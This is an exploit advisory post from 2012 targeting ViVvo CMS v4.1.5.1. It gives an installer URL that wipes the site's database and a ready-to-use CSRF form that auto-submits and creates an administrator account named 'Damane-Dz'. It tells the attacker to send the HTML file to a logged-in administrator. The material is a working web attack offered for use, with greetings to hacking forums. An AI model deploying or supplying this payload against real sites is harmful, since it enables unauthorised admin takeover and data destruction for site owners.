facebook facebook twitter rss

ViVvo CMS v4.1.5.1 Multi Vuln

Author: DamaneDz , Published: 23-09-2012
+-----------------------------------------------------------+
# Exploit Title : ViVvo CMS v4.1.5.1 Multi Vuln
# Date : 23-09-2012
# Author : Damane-Dz
# Email : Damane-Dz@hotmail.com
# WebSite : WwW.Exploit4Arab.CoM
# Product Download : http://www.sendspace.com/file/afwbsx
# Version : 4.1.5.1 (Not TesteD At The OlD And New Version :p)
# Category : WebApps
# Tested on : Win XP SP3
+-----------------------------------------------------------+

./START

1)Install Wizard:

The Install Wizard Will Remove Any Old Databases And Create A Clean New Database.

P.S: This One Work At All Version ^_^

http://www.site.com/installer/index.php

2)CSRF:

<form method="POST" action="http://www.site.com/vivvotest/admin/user_edit.php" name="damane">
<input type="hidden" name="href" value="http://www.site.com/vivvotest/admin/users.php"/>
<input type="hidden" name="SECURITY_TOKEN" value="Token Value"/>
<input type="hidden" name="action" value="user"/>
<input type="hidden" name="cmd" value="add"/>
<input type="hidden" name="USER_activated" value="1"/>
<input type="hidden" name="USER_groups[]" value="2"/>
<input type="hidden" name="USER_first_name" value="abdou"/>
<input type="hidden" name="USER_last_name" value="Damane"/>
<input type="hidden" name="USER_username" value="Damane-Dz"/>
<input type="hidden" name="USER_password" value="algerie"/>
<input type="hidden" name="USER_retype_password" value="algerie"/>
<input type="hidden" name="USER_email_address" value="Damane-Dz@hotmail.com"/>
<input type="hidden" name="USER_picture" value=""/>
<input type="hidden" name="USER_bio" value="Love CodinG ^_^"/>
<input type="hidden" name="USER_www" value="www.exploit4arab.com"/>
</form><script>damane.submit();</script>

How To Use CSRF One ?

After Change The Write Information Like The SiteWeb Victim

You NeeD To SenD The HTML File To The Victim And He Must Be Loggin In The Admin Panel .

./D0N3

-----------Special GreatZ And Thanks To: ---------------------------------------------------------+
Forums: http://www.sec4ever.com/ - http://www.is-sec.org/ - http://www.dz-root.com/ >> MemberZ ^_^
FrienDz: * N4ss!m * DoSs-Dz * Over-X * Klashinkov3 * Ev!lScr!pt-Dz * Ra3Ch * Apocalypse * Sec4Ever * Kader11000 *
Smail002 * Jago-Dz * B07 M4S73R * Hacker-1420 * L3b-R'1z * b0x * Th3 K!LLER Dz * Gastro-Dz
The Viper * And All Dz-Hackers(Algeria)
--------------------------------------------------------------------------------------------------+

Like us on Facebook :